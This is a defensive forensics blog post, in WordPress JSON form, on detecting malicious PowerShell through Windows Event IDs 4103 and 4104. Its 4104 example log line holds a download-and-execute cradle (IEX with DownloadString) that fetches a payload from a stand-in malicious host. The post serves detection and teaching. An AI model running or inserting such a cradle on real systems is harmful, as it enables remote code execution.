{"id":117,"date":"2025-02-13T03:14:07","date_gmt":"2025-02-13T03:14:07","guid":{"rendered":"https:\/\/www.cyberguard6.com\/blog\/?p=117"},"modified":"2025-02-13T03:14:07","modified_gmt":"2025-02-13T03:14:07","slug":"uncovering-malicious-powershell-security-event-ids","status":"publish","type":"post","link":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/","title":{"rendered":"Uncovering Malicious PowerShell Security Event IDs"},"content":{"rendered":"<p>PowerShell is a widely used command-line tool in Windows environments, providing administrators with powerful automation, configuration management, and system control capabilities. However, these same capabilities make it an attractive tool for threat actors seeking to execute malicious commands, evade detection, and maintain persistence within a compromised network. By analyzing Windows Security Event Logs\u2014particularly Event IDs 4103 and 4104\u2014security teams can identify and mitigate potential threats before they escalate.<\/p>\n<h3><strong>Why Do Threat Actors Use PowerShell?<\/strong><\/h3>\n<p>PowerShell is a preferred tool for cybercriminals due to its:<\/p>\n<ul>\n<li>Native Integration: PowerShell is built into Windows, reducing the need for attackers to introduce foreign executables that might trigger security alerts.<\/li>\n<li>In-Memory Execution: Malicious PowerShell scripts can run directly in memory, avoiding disk-based detection by traditional antivirus solutions.<\/li>\n<li>Obfuscation Capabilities: Attackers can encode or obfuscate PowerShell commands to bypass security defenses and logging mechanisms.<\/li>\n<li>System Control &amp; Reconnaissance: PowerShell provides deep access to system components, allowing attackers to gather intelligence, manipulate system configurations, and move laterally within a network.<\/li>\n<\/ul>\n<h3><strong>Windows Security Event ID 4103: PowerShell Module Logging<\/strong><\/h3>\n<p>Event ID 4103 is generated when PowerShell module logging is enabled, capturing details about executed commands and scripts. This log provides insights into PowerShell activities, including:<\/p>\n<ul>\n<li>Executed Modules: Identifies which PowerShell modules are being used, potentially revealing malicious intent (e.g., Mimikatz, PowerView).<\/li>\n<li>Obfuscated Commands: Detects encoded or obfuscated scripts attempting to bypass security controls.<\/li>\n<li>Unexpected Administrative Actions: Flags unauthorized use of administrative PowerShell commands that could indicate privilege escalation or unauthorized access.<\/li>\n<\/ul>\n<h4><strong>Example of a Suspicious 4103 Log Entry:<\/strong><\/h4>\n<p>&nbsp;<\/p>\n<pre><em><strong>HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Enc SQB... (Base64 Encoded Command)<\/strong><\/em><\/pre>\n<p>A Base64-encoded command like the one above may indicate an attacker is attempting to evade detection while executing malicious scripts.<\/p>\n<h3><strong>Windows Security Event ID 4104: PowerShell Script Block Logging<\/strong><\/h3>\n<p>Event ID 4104 captures detailed information about executed PowerShell script blocks, including fully expanded and de-obfuscated commands. This makes it particularly useful for:<\/p>\n<ul>\n<li>Detecting Malicious Code Execution: Identifies scripts executing suspicious commands, such as downloading payloads or disabling security controls.<\/li>\n<li>Uncovering Obfuscation Techniques: Reveals attackers\u2019 attempts to mask their true intentions by encoding or fragmenting scripts.<\/li>\n<li>Tracking Attack Progression: Provides insight into how an attacker is interacting with the environment over time.<\/li>\n<\/ul>\n<h4><strong>Example of a Malicious 4104 Log Entry:<\/strong><\/h4>\n<p>&nbsp;<\/p>\n<pre><strong><em>ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http:\/\/malicious.com\/payload.ps1')<\/em><\/strong><\/pre>\n<p>This log entry indicates an attempt to download and execute a remote PowerShell script, a common tactic used in malware deployment and post-exploitation activities.<\/p>\n<h3><strong>How Event IDs 4103 and 4104 Uncover Malicious Activity<\/strong><\/h3>\n<p>By monitoring and correlating Event IDs 4103 and 4104, security teams can:<\/p>\n<ul>\n<li>Identify Attack Techniques: Detect attempts to download remote payloads, escalate privileges, or disable security mechanisms.<\/li>\n<li>Correlate Suspicious Activities: Link script executions with other system events to determine whether an attack is underway.<\/li>\n<li>Mitigate Threats Proactively: Alert on abnormal PowerShell usage, automatically flagging or blocking known attack patterns.<\/li>\n<\/ul>\n<h3><strong>Defensive Measures Against PowerShell-Based Attacks<\/strong><\/h3>\n<p>To reduce the risk of PowerShell exploitation, organizations should:<\/p>\n<ul>\n<li>Enable Logging: Ensure PowerShell Module Logging (Event ID 4103) and Script Block Logging (Event ID 4104) are turned on.<\/li>\n<li>Implement Constrained Language Mode: Restrict PowerShell&#8217;s ability to execute advanced scripts unless explicitly authorized.<\/li>\n<li>Monitor and Analyze Logs: Use SIEM solutions to detect, alert, and respond to anomalous PowerShell activity.<\/li>\n<li>Restrict PowerShell Access: Limit PowerShell usage to necessary personnel and enforce execution policies.<\/li>\n<\/ul>\n<p><strong>Conclusion<\/strong><\/p>\n<p>Threat actors rely on PowerShell due to its powerful capabilities and stealthy execution methods. However, by proactively monitoring Windows Security Event IDs 4103 and 4104, organizations can uncover malicious activity, analyze threat actor tactics, and respond before significant damage occurs. Strengthening PowerShell security policies and implementing continuous monitoring will significantly reduce the risk of exploitation and improve an organization\u2019s overall cybersecurity resilience.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PowerShell is a widely used command-line tool in Windows environments, providing administrators with powerful automation, configuration management, and system control capabilities. However, these same capabilities make it an attractive tool for threat actors seeking to execute malicious commands, evade detection, and maintain persistence within a compromised network. By analyzing Windows Security Event Logs\u2014particularly Event IDs&hellip; <a class=\"more-link\" href=\"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/\">Continue reading <span class=\"screen-reader-text\">Uncovering Malicious PowerShell Security Event IDs<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[8],"tags":[],"class_list":["post-117","post","type-post","status-publish","format-standard","hentry","category-powershell","entry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Uncovering Malicious PowerShell Security Event IDs<\/title>\n<meta name=\"description\" content=\"Learn how Windows Security Event IDs 4103 and 4104 can help detect malicious PowerShell activity. Discover how threat actors exploit PowerShell and how to defend against these attacks with effective logging and monitoring strategies.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uncovering Malicious PowerShell Security Event IDs\" \/>\n<meta property=\"og:description\" content=\"Learn how Windows Security Event IDs 4103 and 4104 can help detect malicious PowerShell activity. Discover how threat actors exploit PowerShell and how to defend against these attacks with effective logging and monitoring strategies.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/\" \/>\n<meta property=\"og:site_name\" content=\"CyberGuard 6 Blog\" \/>\n<meta property=\"article:published_time\" content=\"2025-02-13T03:14:07+00:00\" \/>\n<meta name=\"author\" content=\"Jason\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jason\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/\"},\"author\":{\"name\":\"Jason\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#\\\/schema\\\/person\\\/d34605e12eebeb4c509712189ee29ba7\"},\"headline\":\"Uncovering Malicious PowerShell Security Event IDs\",\"datePublished\":\"2025-02-13T03:14:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/\"},\"wordCount\":588,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#organization\"},\"articleSection\":[\"powershell\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/\",\"url\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/\",\"name\":\"Uncovering Malicious PowerShell Security Event IDs\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#website\"},\"datePublished\":\"2025-02-13T03:14:07+00:00\",\"description\":\"Learn how Windows Security Event IDs 4103 and 4104 can help detect malicious PowerShell activity. Discover how threat actors exploit PowerShell and how to defend against these attacks with effective logging and monitoring strategies.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/uncovering-malicious-powershell-security-event-ids\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Uncovering Malicious PowerShell Security Event IDs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/\",\"name\":\"CyberGuard 6 Blog\",\"description\":\"Blogging About Digital Forensics &amp; Incident Response\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#organization\",\"name\":\"CyberGuard 6 Blog\",\"url\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.png\",\"contentUrl\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/02\\\/logo.png\",\"width\":717,\"height\":60,\"caption\":\"CyberGuard 6 Blog\"},\"image\":{\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/#\\\/schema\\\/person\\\/d34605e12eebeb4c509712189ee29ba7\",\"name\":\"Jason\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5659a77231076ed9e2b05852c4085f0e519369f66a734771d7b5e53ef8980137?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5659a77231076ed9e2b05852c4085f0e519369f66a734771d7b5e53ef8980137?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5659a77231076ed9e2b05852c4085f0e519369f66a734771d7b5e53ef8980137?s=96&d=mm&r=g\",\"caption\":\"Jason\"},\"description\":\"Jason Lapene is a distinguished cybersecurity professional celebrated for his profound expertise and analytical acumen in the field of digital forensics. With a solid academic foundation in Computer Information Systems from Georgia State University and a Master's Degree in Cyber Security from Kennesaw State University, Jason has equipped himself with a comprehensive skill set for tackling complex cyber threats. In addition to his academic credentials, he holds an impressive array of GIAC certifications, including GCFA, GCIH, GSEC, and GSTRT, underscoring his practical and theoretical prowess. With over a decade of experience as a forensic investigator, Jason has honed his skills in various prestigious roles at notable organizations such as Children's Hospital of Atlanta, AT&amp;T, and Rapid7. His specialization in disc forensics, business email compromises, and ransomware investigations and negotiations has made him a sought-after expert in the cybersecurity domain. Jason\u2019s relentless commitment to safeguarding digital environments and his methodical approach to resolving cyber incidents have led to his reputation as a trailblazer in the field, continually advancing the standards of cybersecurity practice.\",\"sameAs\":[\"https:\\\/\\\/www.cyberguard6.com\\\/\"],\"url\":\"https:\\\/\\\/www.cyberguard6.com\\\/blog\\\/author\\\/jason\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Uncovering Malicious PowerShell Security Event IDs","description":"Learn how Windows Security Event IDs 4103 and 4104 can help detect malicious PowerShell activity. Discover how threat actors exploit PowerShell and how to defend against these attacks with effective logging and monitoring strategies.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/","og_locale":"en_US","og_type":"article","og_title":"Uncovering Malicious PowerShell Security Event IDs","og_description":"Learn how Windows Security Event IDs 4103 and 4104 can help detect malicious PowerShell activity. Discover how threat actors exploit PowerShell and how to defend against these attacks with effective logging and monitoring strategies.","og_url":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/","og_site_name":"CyberGuard 6 Blog","article_published_time":"2025-02-13T03:14:07+00:00","author":"Jason","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Jason","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/#article","isPartOf":{"@id":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/"},"author":{"name":"Jason","@id":"https:\/\/www.cyberguard6.com\/blog\/#\/schema\/person\/d34605e12eebeb4c509712189ee29ba7"},"headline":"Uncovering Malicious PowerShell Security Event IDs","datePublished":"2025-02-13T03:14:07+00:00","mainEntityOfPage":{"@id":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/"},"wordCount":588,"commentCount":0,"publisher":{"@id":"https:\/\/www.cyberguard6.com\/blog\/#organization"},"articleSection":["powershell"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/","url":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/","name":"Uncovering Malicious PowerShell Security Event IDs","isPartOf":{"@id":"https:\/\/www.cyberguard6.com\/blog\/#website"},"datePublished":"2025-02-13T03:14:07+00:00","description":"Learn how Windows Security Event IDs 4103 and 4104 can help detect malicious PowerShell activity. Discover how threat actors exploit PowerShell and how to defend against these attacks with effective logging and monitoring strategies.","breadcrumb":{"@id":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.cyberguard6.com\/blog\/uncovering-malicious-powershell-security-event-ids\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.cyberguard6.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Uncovering Malicious PowerShell Security Event IDs"}]},{"@type":"WebSite","@id":"https:\/\/www.cyberguard6.com\/blog\/#website","url":"https:\/\/www.cyberguard6.com\/blog\/","name":"CyberGuard 6 Blog","description":"Blogging About Digital Forensics &amp; Incident Response","publisher":{"@id":"https:\/\/www.cyberguard6.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.cyberguard6.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.cyberguard6.com\/blog\/#organization","name":"CyberGuard 6 Blog","url":"https:\/\/www.cyberguard6.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.cyberguard6.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.cyberguard6.com\/blog\/wp-content\/uploads\/2025\/02\/logo.png","contentUrl":"https:\/\/www.cyberguard6.com\/blog\/wp-content\/uploads\/2025\/02\/logo.png","width":717,"height":60,"caption":"CyberGuard 6 Blog"},"image":{"@id":"https:\/\/www.cyberguard6.com\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.cyberguard6.com\/blog\/#\/schema\/person\/d34605e12eebeb4c509712189ee29ba7","name":"Jason","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/5659a77231076ed9e2b05852c4085f0e519369f66a734771d7b5e53ef8980137?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/5659a77231076ed9e2b05852c4085f0e519369f66a734771d7b5e53ef8980137?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/5659a77231076ed9e2b05852c4085f0e519369f66a734771d7b5e53ef8980137?s=96&d=mm&r=g","caption":"Jason"},"description":"Jason Lapene is a distinguished cybersecurity professional celebrated for his profound expertise and analytical acumen in the field of digital forensics. With a solid academic foundation in Computer Information Systems from Georgia State University and a Master's Degree in Cyber Security from Kennesaw State University, Jason has equipped himself with a comprehensive skill set for tackling complex cyber threats. In addition to his academic credentials, he holds an impressive array of GIAC certifications, including GCFA, GCIH, GSEC, and GSTRT, underscoring his practical and theoretical prowess. With over a decade of experience as a forensic investigator, Jason has honed his skills in various prestigious roles at notable organizations such as Children's Hospital of Atlanta, AT&amp;T, and Rapid7. His specialization in disc forensics, business email compromises, and ransomware investigations and negotiations has made him a sought-after expert in the cybersecurity domain. Jason\u2019s relentless commitment to safeguarding digital environments and his methodical approach to resolving cyber incidents have led to his reputation as a trailblazer in the field, continually advancing the standards of cybersecurity practice.","sameAs":["https:\/\/www.cyberguard6.com\/"],"url":"https:\/\/www.cyberguard6.com\/blog\/author\/jason\/"}]}},"_links":{"self":[{"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/posts\/117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/comments?post=117"}],"version-history":[{"count":7,"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/posts\/117\/revisions"}],"predecessor-version":[{"id":124,"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/posts\/117\/revisions\/124"}],"wp:attachment":[{"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/media?parent=117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/categories?post=117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cyberguard6.com\/blog\/wp-json\/wp\/v2\/tags?post=117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}